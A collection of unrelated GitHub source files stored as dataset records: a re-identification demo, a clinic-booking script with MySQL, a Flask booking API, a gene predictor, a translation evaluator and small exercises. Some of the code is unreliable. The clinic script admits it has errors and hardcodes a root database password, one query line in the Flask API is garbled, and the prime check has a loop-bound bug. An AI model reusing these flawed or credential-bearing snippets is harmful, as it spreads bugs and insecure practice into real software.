faiss.IndexFlatIP(512)\n index.add(gf.contiguous().cpu().numpy())\n D, I = index.search(feature.cpu().numpy(), 10)\n # junk_index = np.argwhere(gl==-1)\n # mask = np.in1d(I, junk_index, invert=True)\n # I = I[mask]\n return I.squeeze(),D.squeeze()\n \ndef imshow(path, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n im = plt.imread(path)\n plt.imshow(im)\n if title is not None:\n plt.title(title)\n plt.pause(0.001) # pause a bit so that plots are updated\n \ndef demo(query_path = \"data/market1501/query/0001_c1s1_001051_00.jpg\"):\n model = load_model()\n img = cv2.imread(query_path)\n feature = extract_feature(model, img)\n result = scipy.io.loadmat('pytorch_result.mat')\n gallery_feature = torch.FloatTensor(result['gallery_f'])\n gallery_feature = gallery_feature.to(device)\n gallery_label = result['gallery_label'][0]\n try:\n index,score = sort_img_faiss(feature,gallery_feature,gallery_label)\n except:\n index, score = sort_img(feature,gallery_feature,gallery_label) \n data_dir = 'data/market1501/pytorch'\n image_datasets = datasets.ImageFolder(os.path.join(data_dir,\"gallery\"))\n \n try:\n fig = plt.figure(figsize=(16,4))\n ax = plt.subplot(1,11,1)\n ax.axis('off')\n imshow(query_path,'query')\n for i in range(10):\n ax = plt.subplot(1,11,i+2)\n ax.axis('off')\n img_path, _ = image_datasets.imgs[index[i]]\n ax.set_title('%d:%.3f'%(i+1,score[i]), color='blue')\n imshow(img_path)\n print(img_path)\n except RuntimeError:\n for i in range(10):\n img_path = image_datasets.imgs[index[i]]\n print(img_path[0])\n print('If you want to see the visualization of the ranking result, graphical user interface is needed.')\n fig.savefig(\"query.png\")\n \nif __name__==\"__main__\":\n demo()\n input()","repo_name":"HKUST-NISL/Grace_Attention_ReID","sub_path":"test_demo.py","file_name":"test_demo.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38596664656","text":"# O Código que está funcionando perfeitamente é o que \"NÃO CONTÉM MYSQL\".\r\n# Este código não esta 100% com sua funcionalidade, apenas postei pelo fato de ter tentado colocar banco de dados no código. O código contem alguns erros de reprodução.\r\n\r\nfrom datetime import datetime\r\nimport mysql.connector\r\n\r\n# Conecta ao banco de dados\r\nconn = mysql.connector.connect(host=\"localhost\", user=\"root\", password=\"88465524\", database=\"clinica\")\r\n\r\n# Cria uma tabela para armazenar os pacientes, caso não exista\r\ncursor = conn.cursor()\r\ncursor.execute(''' CREATE TABLE IF NOT EXISTS pacientes ( nome VARCHAR(255), telefone VARCHAR(20) PRIMARY KEY, UNIQUE (telefone))''')\r\n\r\n# Lista de armarzenamento dos pacientes cadastrados\r\nPacientesCadastrados = []\r\n\r\n# Lista de armazenamento dos Agendamentos\r\nAgendamentos = []\r\n\r\n# Cadastro Paciente\r\ndef CadastroPaciente():\r\n global PacientesCadastrados\r\n\r\n nome = input(\"Digite o nome do paciente: \")\r\n if any(char.isdigit() for char in nome):\r\n print(\"\\nOpção inválida. O nome do Paciente não pode conter números.\")\r\n return\r\n \r\n \r\n telefone = input(\"Digite o telefone do paciente: \")\r\n cursor.execute(\"SELECT * FROM pacientes WHERE telefone = %s\", (telefone,))\r\n paciente = cursor.fetchone()\r\n if paciente:\r\n print(\"Paciente já cadastrado!\")\r\n return\r\n \r\n\r\n # Insere o paciente no banco de dados\r\n cursor.execute(\"INSERT INTO pacientes (nome, telefone) VALUES (%s, %s)\", (nome, telefone))\r\n conn.commit()\r\n \r\n print(\"Paciente cadastrado com sucesso!\")\r\n\r\n # Atualiza a lista de pacientes cadastrados\r\n PacientesCadastrados = []\r\n cursor.execute(\"SELECT * FROM pacientes\")\r\n for row in cursor:\r\n\r\n PacientesCadastrados.append({\"nome\": row[0], \"telefone\": row[1]})\r\n\r\n\r\n# Listas Paciente\r\ndef PacienteLista():\r\n print(\"\\n============ Pacientes Cadastrados ============\")\r\n cursor.execute(\"SELECT * FROM pacientes\")\r\n contador = 1\r\n for row in cursor:\r\n print(f\"Paciente: {row[0]}, Telefone: {row[1]}\")\r\n contador += 1\r\n\r\n# Marcações das Consultas\r\n\r\ndef Consultas():\r\n if len(PacientesCadastrados) == 0:\r\n print(\"Não á nenhum paciente cadastrado na clinica.\")\r\n return\r\n \r\n PacienteLista(PacientesCadastrados)\r\n NumeroPaciente = int(input(\"Digite o número do paciente: \"))\r\n if NumeroPaciente < 1 or NumeroPaciente > len(PacientesCadastrados):\r\n print(\"Número inválido.\")\r\n return\r\n \r\n Paciente = PacientesCadastrados[NumeroPaciente - 1]\r\n ConsultaDesejada = input(\"Digite a consulta Desejada: \")\r\n DiaConsulta = input(\"Digite o dia desejado para o agendamento da Consulta (formato: dd/mm/aaaa): \")\r\n HoraConsulta = input(\"Digite a Hora desejada: (formato: hh:mm): \")\r\n\r\n DataHora = datetime.strptime(DiaConsulta + \" \" + HoraConsulta, \"%d/%m/%Y %H:%M\")\r\n DataHoraAtual = datetime.now()\r\n\r\n if DataHora < DataHoraAtual:\r\n print(\"Não é possível agendar consultas retroativas.\")\r\n return\r\n\r\n for agendamento in Agendamentos:\r\n DataHoraCadastrada = datetime.strptime(agendamento[\"Dia\"] + \" \" + agendamento[\"Hora\"], \"%d/%m/%Y %H:%M\")\r\n if DataHora == DataHoraCadastrada:\r\n print(\"Data e hora indisponíveis para agendamento.\")\r\n return\r\n\r\n Agendamentos.append({ \"Consulta\": ConsultaDesejada, \"Paciente\": Paciente, \"Dia\": DiaConsulta, \"Hora\": HoraConsulta })\r\n print(\"Consulta marcada com sucesso.\")\r\n\r\n# Cancelamento das Consultas\r\ndef cancelamentoConsulta():\r\n if len(Agendamentos) == 0:\r\n print(\"Não há agendamentos para cancelar.\")\r\n return\r\n\r\n print(\"\\n============ Agendamentos ============\")\r\n for i, agendamento in enumerate(Agendamentos, start=1):\r\n print(f\"{i}. Paciente: {agendamento['Paciente']['nome']}, Telefone: {agendamento['Paciente']['telefone']}, Dia: {agendamento['Dia']}, Hora: {agendamento['Hora']}, Consulta: {agendamento['Consulta']}\")\r\n \r\n agendamento_numero = int(input(\"Digite o número do agendamento para cancelar: \"))\r\n if agendamento_numero < 1 or agendamento_numero > len(Agendamentos):\r\n print(\"Número inválido.\")\r\n return\r\n \r\n agendamento = Agendamentos[agendamento_numero - 1]\r\n print(\"\\nAgendamento selecionado:\")\r\n print(f\"Paciente: {agendamento['Paciente']['nome']}, Telefone: {agendamento['Paciente']['telefone']}, Dia: {agendamento['Dia']}, Hora: {agendamento['Hora']}, Consulta: {agendamento['Consulta']}\")\r\n \r\n confirmacao = input(\"\\nDeseja cancelar a consulta? [ 1-Sim ] [ 2-Não ]: \")\r\n if confirmacao.upper() == \"1\":\r\n Agendamentos.pop(agendamento_numero - 1)\r\n print(\"Consulta cancelada com sucesso.\")\r\n\r\ndef menu_principal():\r\n while True:\r\n print(\"\\n============ Clinica de Consultas Ágil ============\")\r\n print(\"| |\")\r\n print(\"|1. Cadastrar paciente; |\")\r\n print(\"|2. Marcar Consulta; |\")\r\n print(\"|3. Cancelar Consulta; |\")\r\n print(\"|0. Sair. |\")\r\n print(\"| |\")\r\n print(\"=====================================================\")\r\n \r\n opcao = input(\"Digite a opção desejada: \")\r\n\r\n if opcao == \"1\":\r\n CadastroPaciente()\r\n elif opcao == \"2\":\r\n Consultas(PacientesCadastrados)\r\n elif opcao == \"3\":\r\n cancelamentoConsulta()\r\n elif opcao == \"0\":\r\n break\r\n else:\r\n print(\"Opção inválida. Por favor, escolha uma opção válida.\")\r\n\r\n# Chama a função do menu principal para iniciar o programa\r\nmenu_principal()\r\n\r\n# Fecha a conexão com o banco de dados ao sair do programa\r\nconn.close()\r\n\r\nprint(\"Obrigado por usar a Clínica de Consultas Ágil. Até logo!\")\r\n","repo_name":"evellynamelia/Desafio-Aceleradora-Agil","sub_path":"Desafio Clínica de Consultas Ágil/Clinica com MySql.py","file_name":"Clinica com MySql.py","file_ext":"py","file_size_in_byte":6021,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25640909160","text":"# -*-coding:utf-8-*-\n\nfrom . import api\nfrom ihome.util.commens import login_required\nfrom flask import request, g, jsonify, current_app\nfrom ihome.response_code import RET\nfrom datetime import datetime\nfrom ihome.models import Order, House\nfrom ihome import db, redis_store\n\n\n@api.route('/orders', methods=['POST'])\n@login_required\ndef save_orders():\n # 获取数据\n user_id = g.user_id\n req_dict = request.get_json()\n print(req_dict)\n house_id = req_dict.get('house_id')\n start_date_str = req_dict.get('start_date')\n end_date_str = req_dict.get('end_date')\n\n # 数据校验\n # 数据完整性\n if not all([house_id, start_date_str, end_date_str]):\n return jsonify(errno=RET.PARAMERR, errmsg=u'数据不完整')\n\n # 校验时间格式\n try:\n start_date = datetime.strptime(start_date_str, '%Y-%m-%d')\n end_date = datetime.strptime(end_date_str, '%Y-%m-%d')\n\n assert start_date <= end_date\n\n # 提取入住天数\n days = (end_date-start_date).days + 1\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.PARAMERR, errmsg=u'时间格式错误')\n\n # 校验房屋\n try:\n house = House.query.get(house_id)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'房屋信息查询失败')\n\n if house is None:\n return jsonify(errno=RET.NODATA, errmsg=u'房屋不存在')\n\n # 校验入住时间冲突\n try:\n order_count = Order.query.filter(start_dateOrder.begin_date).count()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'入住时间校验出错')\n\n if order_count > 0:\n return jsonify(errno=RET.DATAEXIST, errmsg=u'订单冲突')\n\n # 校验房主和下单者\n if house.user_id == user_id:\n return jsonify(errno=RET.ROLEERR, errmsg=u'房主不允许下单')\n\n # 业务处理: 保存订单\n order = Order()\n order.user_id = user_id\n order.house_id = house_id\n order.begin_date = start_date\n order.end_date = end_date\n order.days = days\n order.house_price = house.price\n order.amount = days * house.price\n\n try:\n db.session.add(order)\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'订单保存失败')\n\n # 返回响应\n return jsonify(errno=RET.OK, errmsg=u'下单成功')\n\n\n# /api/v1.0/orders?role=landlord role=custom\n@api.route('/orders', methods=['GET'])\n@login_required\ndef get_orders():\n user_id = g.user_id\n role = request.args.get('role', '')\n\n try:\n if role == 'landlord':\n houses = House.query.filter(House.user_id==user_id).all()\n house_ids = [house.id for house in houses]\n orders = Order.query.filter(Order.house_id.in_(house_ids)).all()\n else:\n orders = Order.query.filter_by(user_id=user_id).all()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'查询订单错误')\n\n orders_li = []\n if orders:\n for order in orders:\n orders_li.append(order.to_dict())\n\n return jsonify(errno=RET.OK, errmsg=u'查询成功', data=orders_li)\n\n\n@api.route('/order//status', methods=['PUT'])\n@login_required\ndef accept_reject_order(order_id):\n # 获取参数\n user_id = g.user_id\n req_dict = request.get_json()\n if not req_dict:\n return jsonify(errno=RET.PARAMERR, errmsg=u'无效参数')\n\n action = req_dict.get('action')\n\n # 参数校验\n if action not in ('accept', 'reject'):\n return jsonify(errno=RET.PARAMERR, errmsg=u'参数错误')\n\n try:\n order = Order.query.filter(Order.id==order_id, Order.status=='WAIT_ACCEPT').first()\n house = order.house\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'查询订单错误')\n\n if house.user_id != user_id:\n return jsonify(errno=RET.ROLEERR, errmsg=u'不允许修改他人的订单')\n\n # 业务处理: 根据需要更改订单状态/添加说明\n if action == 'accept':\n order.status = 'WAIT_PAYMENT'\n else:\n order.status = 'REJECTED'\n reason = req_dict.get('reason')\n if not reason:\n return jsonify(errno=RET.PARAMERR, errmsg=u'拒单原因缺失')\n order.comment = reason\n\n try:\n db.session.add(order)\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'订单修改失败')\n\n # 返回响应\n return jsonify(errno=RET.OK, errmsg=u'订单修改成功!')\n\n\n@api.route('/order//comment', methods=['PUT'])\n@login_required\ndef update_comment(order_id):\n # 接收数据\n user_id = g.user_id\n req_dict = request.get_json()\n comment = req_dict.get('comment')\n\n # 数据校验\n if not comment:\n return jsonify(errno=RET.PARAMERR, errmsg=u'参数错误')\n\n try:\n order = Order.query.filter(Order.id==order_id, Order.user_id==user_id,\n Order.status=='WAIT_COMMENT').first()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'查询订单错误')\n\n if not order:\n return jsonify(errno=RET.NODATA, errmsg=u'订单不存在')\n\n if user_id != order.user_id:\n return jsonify(errno=RET.ROLEERR, errsmg=u'不能评价他人订单')\n\n # 业务处理: 修改评论\n order.comment = comment\n order.status = 'COMPLETE'\n order.house.order_count += 1\n\n try:\n db.session.add(order)\n db.session.add(order.house)\n db.session.commit()\n except Exception as e:\n current_app.logger(e)\n db.session.rollback()\n return jsonify(errno=RET.DBERR, errmsg=u'添加评论失败')\n\n # 删除缓存数据\n try:\n redis_store.delete('house_info_%s' % order.house.id)\n except Exception as e:\n current_app.logger.error(e)\n\n # 返回响应\n return jsonify(errno=RET.OK, errmsg=u'评论添加成功')","repo_name":"shenxuexin/flask_ihome","sub_path":"ihome/api_1_0/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":6357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11241600092","text":"\"\"\"Perform assembly based on debruijn graph.\"\"\"\n\n#!/bin/env python3\n# -*- coding: utf-8 -*-\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# A copy of the GNU General Public License is available at\n# http://www.gnu.org/licenses/gpl-3.0.html\n\n# ===============\n# IMPORT *\n# ===============\n# [A]\nimport argparse\n# [C]\nimport csv\n# [O]\nimport os\n# [R]\nimport re\n# [S]\nimport sys\n\n# [T]\nfrom tqdm import tqdm\n\n\n__author__ = \"ROUAUD Lucas\"\n__credits__ = __author__\n__version__ = \"1.0.0\"\n__maintainer__ = __author__\n__email__ = \"lucas.rouaud@gmail.com\"\n__status__ = \"Developpement\"\n\n\ndef isfile(path):\n \"\"\"Check if path is an existing file.\n :Parameters:\n path: Path to the file\n \"\"\"\n if not os.path.isfile(path):\n if os.path.isdir(path):\n msg = f\"{path} is a directory\"\n else:\n msg = f\"{path} does not exist.\"\n raise argparse.ArgumentTypeError(msg)\n return path\n\n\ndef isdir(path):\n \"\"\"Check if path is an existing file.\n :Parameters:\n path: Path to the file\n \"\"\"\n if not os.path.isdir(path):\n if os.path.isfile(path):\n msg = f\"{path} is a file\"\n else:\n msg = f\"{path} does not exist.\"\n raise argparse.ArgumentTypeError(msg)\n return path\n\n\ndef get_arguments():\n \"\"\"Retrieves the arguments of the program.\n Returns: An object that contains the arguments\n \"\"\"\n # Parsing arguments\n parser = argparse.ArgumentParser(description=__doc__,\n usage=f\"{sys.argv[0]} -h\")\n parser.add_argument(\"-i\", dest=\"genome_file\", type=isfile, required=True,\n help=\"Complete genome file in fasta format\")\n parser.add_argument(\"-g\", dest=\"min_gene_len\", type=int,\n default=50, help=\"Minimum gene length to consider\")\n parser.add_argument(\"-s\", dest=\"max_shine_dalgarno_distance\", type=int,\n default=16, help=\"Maximum distance from start codon \"\n \"where to look for a Shine-Dalgarno motif\")\n parser.add_argument(\"-d\", dest=\"min_gap\", type=int, default=40,\n help=(\"Minimum gap between two genes (shine box not \"\n \"included).\"))\n parser.add_argument(\"-p\", dest=\"predicted_genes_file\", type=str,\n default=os.curdir + os.sep + \"predict_genes.csv\",\n help=\"Tabular file giving position of predicted genes\")\n parser.add_argument(\"-o\", dest=\"fasta_file\", type=str,\n default=os.curdir + os.sep + \"genes.fna\",\n help=\"Fasta file giving sequence of predicted genes\")\n\n return vars(parser.parse_args())\n\n\ndef read_fasta(fasta_file):\n \"\"\"Extract the complete genome sequence as a single string.\n \"\"\"\n with open(fasta_file, \"rt\", encoding=\"utf-8\") as file:\n seq: str = \"\"\n\n for line in file:\n if line[0] == \">\":\n continue\n\n seq += line.strip()\n\n return seq.upper()\n\n\ndef find_start(start_regex, sequence, start, stop):\n \"\"\"Find the start codon.\n \"\"\"\n result = start_regex.search(sequence, start, stop)\n\n if result is not None:\n return result.start(0)\n else:\n return None\n\n\ndef find_stop(stop_regex, sequence, start):\n \"\"\"Find the stop codon.\n \"\"\"\n result = stop_regex.finditer(sequence, start)\n\n for codon in result:\n if (codon.start(0) - start) % 3 == 0:\n return codon.start(0)\n\n return None\n\n\ndef has_shine_dalgarno(shine_regex, sequence, start,\n max_shine_dalgarno_distance):\n \"\"\"Find a shine dalgarno motif before the start codon.\n \"\"\"\n\n result = shine_regex.search(sequence)\n\n left = start - 6\n right = start - max_shine_dalgarno_distance\n\n if result is not None:\n if left >= (result.start(0) + 1) >= right and \\\n left >= (result.end(0) + 1) >= right:\n return True\n\n return False\n\n\ndef predict_genes(sequence, start_regex, stop_regex, shine_regex,\n min_gene_len, max_shine_dalgarno_distance, min_gap):\n \"\"\"Predict most probable genes.\n \"\"\"\n length = len(sequence)\n gene_list = []\n\n desc = \"PARSING SEQUENCE\"\n\n for i in tqdm(range(length), desc=desc):\n if i + 4 >= length:\n break\n\n codon = sequence[i:(i + 3)]\n\n if find_start(start_regex, codon, 0, 3) is None:\n continue\n\n gene_begin = find_start(start_regex, codon, 0, 3) + i\n\n if find_stop(stop_regex, sequence, gene_begin) is None:\n continue\n\n gene_end = find_stop(stop_regex, sequence, gene_begin) + 3\n\n if not has_shine_dalgarno(shine_regex, sequence, (gene_begin),\n max_shine_dalgarno_distance):\n continue\n\n if gene_end - gene_begin + 1 <= min_gene_len:\n continue\n\n if len(gene_list) >= 2:\n if gene_list[-2][1] - gene_list[-1][0] <= min_gap:\n continue\n\n gene_list.append([gene_begin + 1, gene_end])\n\n return gene_list\n\n\ndef write_genes_pos(predicted_genes_file, probable_genes):\n \"\"\"Write list of gene positions.\n \"\"\"\n try:\n with open(predicted_genes_file, \"wt\", encoding=\"utf-8\") as pred_g:\n predict_genes_writer = csv.writer(pred_g, delimiter=\",\")\n predict_genes_writer.writerow([\"Start\", \"Stop\"])\n predict_genes_writer.writerows(probable_genes)\n except IOError:\n sys.exit(f\"Error cannot open {predicted_genes_file}\")\n\n\ndef fill(text, width=80):\n \"\"\"Split text with a line return to respect fasta format\"\"\"\n return os.linesep.join(text[i:i+width] for i in range(0, len(text), width))\n\n\ndef write_genes(fasta_file, sequence, probable_genes, sequence_rc,\n probable_genes_comp):\n \"\"\"Write gene sequence in fasta format.\n \"\"\"\n try:\n with open(fasta_file, \"wt\", encoding=\"utf-8\") as fasta:\n for i, gene_pos in enumerate(probable_genes):\n fasta.write(f\">gene_{i + 1}{os.linesep}{2}\"\n f\"{fill(sequence[gene_pos[0]-1:gene_pos[1]])}\")\n trans = i\n\n trans += 1\n\n for j, gene_pos in enumerate(probable_genes_comp):\n fasta.write(f\">gene_{trans + 1 + j}{os.linesep}{2}\"\n f\"{fill(sequence_rc[gene_pos[0]-1:gene_pos[1]])}\")\n except IOError:\n sys.exit(f\"Error cannot open {fasta_file}\")\n\n\ndef reverse_complement(kmer):\n \"\"\"Get the reverse complement.\n \"\"\"\n complement = {\"A\": \"T\", \"C\": \"G\", \"G\": \"C\", \"T\": \"A\"}\n return \"\".join([complement[base] for base in kmer[::-1]])\n\n\nif __name__ == \"__main__\":\n m_start_regex = re.compile(\"AT[TG]|[ATCG]TG\")\n m_stop_regex = re.compile(\"TA[GA]|TGA\")\n m_shine_regex = re.compile(\"A?G?GAGG|GGAG|GG.{1}GG\")\n\n arg = get_arguments()\n\n m_sequence = read_fasta(arg[\"genome_file\"])\n m_reverse = reverse_complement(m_sequence)\n\n m_genes = predict_genes(\n sequence=m_sequence,\n start_regex=m_start_regex,\n stop_regex=m_stop_regex,\n shine_regex=m_shine_regex,\n min_gene_len=arg[\"min_gene_len\"],\n max_shine_dalgarno_distance=arg[\"max_shine_dalgarno_distance\"],\n min_gap=arg[\"min_gap\"],\n )\n\n m_genes_reverse = predict_genes(\n sequence=m_reverse,\n start_regex=m_start_regex,\n stop_regex=m_stop_regex,\n shine_regex=m_shine_regex,\n min_gene_len=arg[\"min_gene_len\"],\n max_shine_dalgarno_distance=arg[\"max_shine_dalgarno_distance\"],\n min_gap=arg[\"min_gap\"],\n )\n\n write_genes(\n fasta_file=arg[\"fasta_file\"],\n sequence=m_sequence,\n probable_genes=m_genes,\n sequence_rc=m_reverse,\n probable_genes_comp=m_genes_reverse\n )\n\n write_genes_pos(\n predicted_genes_file=arg[\"predicted_genes_file\"],\n probable_genes=m_genes\n )\n","repo_name":"FilouPlains/TMP_GPRED","sub_path":"gpred/gpred.py","file_name":"gpred.py","file_ext":"py","file_size_in_byte":8418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5549933959","text":"# -*- coding: utf-8 -*-\nimport torch\nfrom torch.autograd import Variable\n\nimport random\n\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport numpy as np\n\nfrom datatools import MAX_LENGTH, USE_CUDA\nfrom datatools import SOS_token, EOS_token\nfrom datatools import variableFromSentence\nfrom datatools import prepareData\n\n\ndef evaluate(encoder, decoder, input_lang, output_lang, sentence,\n max_length=MAX_LENGTH):\n \"\"\"\n 输入句子,得到翻译之后的句子, 并且得到decoder's attention\n :param encoder:\n :param decoder:\n :param input_lang: object(Lang), 输入的语言\n :param output_lang: object(Lang), 输出的语言\n :param sentence:\n :param max_length: 输入句子的最大长度\n :return:\n \"\"\"\n # encode the sentence\n input_variable = variableFromSentence(input_lang, sentence)\n encoder_hidden = encoder.initHidden()\n input_length = input_variable.size()[0]\n\n # set a Variable, [max_length, hidden_size]\n encoder_outputs = Variable(torch.zeros(max_length, encoder.hidden_size))\n encoder_outputs = encoder_outputs.cuda() if USE_CUDA else encoder_outputs\n\n for ei in range(input_length):\n encoder_output, encoder_hidden = encoder(input_variable[ei], encoder_hidden)\n encoder_outputs[ei] = encoder_outputs[ei] + encoder_output[0][0]\n\n # decode the sentence\n decoder_input = Variable(torch.LongTensor([[SOS_token]]))\n decoder_input = decoder_input.cuda() if USE_CUDA else decoder_input\n\n # 将encoder的最后一个hidden作为decoder的hidden\n decoder_hidden = encoder_hidden\n\n # 记录decode的sentence和decoder_attentions\n decoded_words = []\n decoded_attentions = torch.zeros(max_length, max_length)\n\n for di in range(max_length):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs)\n\n decoded_attentions[di] = decoder_attention.data\n topv, topi = decoder_output.data.topk(1)\n ni = topi[0][0]\n if ni == EOS_token:\n decoded_words.append('')\n break\n else:\n decoded_words.append(output_lang.index2word[ni])\n\n # 将当前的输出作为下一个输入\n decoder_input = Variable(torch.LongTensor([[ni]]))\n decoder_input = decoder_input.cuda() if USE_CUDA else decoder_input\n\n return decoded_words, decoded_attentions[: di + 1]\n\n\ndef evaluateRandomly(encoder, decoder, input_lang, output_lang, pairs, n=10):\n for i in range(n):\n pair = random.choice(pairs)\n print('source sentence: ', pair[0])\n print(\"object sentence: \", pair[1])\n output_words, attentions = evaluate(encoder, decoder, input_lang, output_lang,\n pair[0])\n output_sentence = ' '.join(output_words)\n print(\"predicted sentence: \", output_sentence)\n print(\"\")\n\n\ndef showAttention(input_sentence, output_words, attentions):\n \"\"\"show attention\"\"\"\n # set up figure with colorbar\n fig = plt.figure()\n ax = fig.add_subplot(111)\n cax = ax.matshow(attentions.numpy(), cmap='bone')\n fig.colorbar(cax)\n\n # set up axes\n ax.set_xticklabels([''] + input_sentence.split(' ') + [''], rotation=90)\n ax.set_yticklabels([''] + output_words)\n\n # show label at every tick\n ax.xaxis.set_major_locator(ticker.MultipleLocator(1))\n ax.yaxis.set_major_locator(ticker.MultipleLocator(1))\n\n plt.show()\n\n\ndef evaluateAndShowAttention(output_words, attentions, input_sentence):\n print(\"input sentence: \", input_sentence)\n print(\"output = \", ' '.join(output_words))\n showAttention(input_sentence, output_words, attentions)\n\n\nif __name__ == \"__main__\":\n # load data\n input_lang, output_lang, pairs = prepareData('eng', 'fra', True)\n # load trained model\n print(\"loading the model.......\")\n encoder = torch.load(\"./models/encoder.pkl\")\n decoder = torch.load(\"./models/decoder.pkl\")\n # evaluate\n print(\"evaluating sentences........\")\n evaluate_sentences = [\n \"je suis trop froid .\",\n \"elle a cinq ans de moins que moi .\",\n \"elle est trop petit .\",\n \"je ne crains pas de mourir .\",\n \"c est un jeune directeur plein de talent .\"]\n for sent in evaluate_sentences:\n output_words, attentions = evaluate(encoder, decoder, input_lang, output_lang, sent)\n evaluateAndShowAttention(output_words, attentions, sent)\n\n\n\n\n\n\n\n","repo_name":"yyHaker/pytorch_study","sub_path":"src/learn/commonmodels/seq2seq_translation/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34814992763","text":"from goals import *\nfrom models import *\nimport random\n\navailable_sounds = set([\n \"dog\",\n \"cat\",\n \"horse\",\n \"cow\",\n \"bird\",\n \"cricket\"\n])\n\nrandom_sound_words = set([\n \"random\",\n \"any\",\n \"a\",\n \"animal\",\n])\n\nclass PlaySoundActionGoal(ActionGoal):\n \"\"\"Goal for adding a play sound action\"\"\"\n def __init__(self, context, sound=None):\n super().__init__(context)\n self.setattr(\"sound\", sound)\n\n def complete(self):\n assert hasattr(self, \"actions\")\n self.actions.append(PlaySoundAction(self.sound))\n return super().complete()\n\n def setattr(self, attr, value):\n if attr == \"sound\":\n if value is None:\n self.todos.append(GetInputGoal(self.context, self, attr, \"What sound do you want me to play?\"))\n else:\n if value in random_sound_words:\n sound = random.choice(list(available_sounds))\n else:\n sound = value.replace(\"sound\", \"\").replace(\"the\", \"\").strip()\n if sound not in available_sounds:\n self.error = f\"I cannot play the {value} sound. I might not have this sound file.\"\n else:\n self.sound = sound\n return\n setattr(self, attr, value)\n","repo_name":"jessvb/convo","sub_path":"backend/server/goals/sound.py","file_name":"sound.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"21450836045","text":"class Solution(object):\n def distinctEchoSubstrings(self, text):\n \"\"\"\n T:O(n^2) S:O(n)\n Runtime: 2112 ms, faster than 83.08% of Python online submissions for Distinct Echo Substrings.\n Memory Usage: 14.6 MB, less than 100.00% of Python online submissions for Distinct Echo Substrings.\n :type text: str\n :rtype: int\n \"\"\"\n ans = set()\n for i in range(len(text)-1):\n start = i+1\n end = start + (start - i)\n while end <= len(text):\n if text[i:start] == text[start:end]:\n ans.add(text[i:start])\n start += 1\n end = start + (start -i)\n\n return len(ans)\n\nprint(Solution().distinctEchoSubstrings(\"abcabcabc\"))","repo_name":"jerrt2003/leetcode-in-python","sub_path":"1316_Distinct_Echo_Substrings/btterBrutalForce.py","file_name":"btterBrutalForce.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18269082476","text":"import math\r\n\r\n\r\ndef prime(n):\r\n if n < 2:\r\n return False\r\n if n == 2:\r\n return True\r\n if n % 2 == 0:\r\n return False\r\n for i in range(3, int(math.sqrt(n)), 2):\r\n if n % i == 0:\r\n return False\r\n return True\r\n\r\ndef add(n):\r\n ans = n\r\n n //= 10\r\n while n > 0:\r\n ans = ans * 10 + (n % 10)\r\n n //= 10\r\n return ans\r\n\r\n\r\nn = int(input())\r\nn = add(n)\r\nif prime(n) == True:\r\n print(\"prime\")\r\nelse:\r\n print(\"noprime\")","repo_name":"shixiaoliuya/Data_Structure_And_Algorithm","sub_path":"data_structure_and_algorithm/素数回文.py","file_name":"素数回文.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3010318515","text":"import os\nimport sys\nimport _setup_test_env # noqa\n\nfrom io import BytesIO\nfrom returnn.util.task_system import *\nimport inspect\nfrom nose.tools import assert_equal, assert_is_instance\nfrom returnn.util import better_exchook\n\nbetter_exchook.replace_traceback_format_tb()\n\n\ndef pickle_dumps(obj):\n sio = BytesIO()\n p = Pickler(sio)\n p.dump(obj)\n return sio.getvalue()\n\n\ndef pickle_loads(s):\n p = Unpickler(BytesIO(s))\n return p.load()\n\n\ndef test_pickle_anon_new_class():\n # New style class, defined here in this scope, so that we cannot find it in any module.\n class Foo(object):\n a = \"class\"\n b = \"foo\"\n\n def __init__(self):\n self.a = \"hello\"\n\n def f(self, a):\n return a\n\n s = pickle_dumps(Foo)\n Foo2 = pickle_loads(s)\n assert inspect.isclass(Foo2)\n assert Foo is not Foo2 # We get a new class.\n assert Foo2.a == \"class\"\n assert Foo2.b == \"foo\"\n\n inst = Foo2()\n assert inst.a == \"hello\"\n assert inst.b == \"foo\"\n assert inst.f(42) == 42\n\n\ndef test_pickle_anon_old_class():\n # Old style class, defined here in this scope, so that we cannot find it in any module.\n class Foo:\n a = \"class\"\n b = \"foo\"\n\n def __init__(self):\n self.a = \"hello\"\n\n def f(self, a):\n return a\n\n s = pickle_dumps(Foo)\n 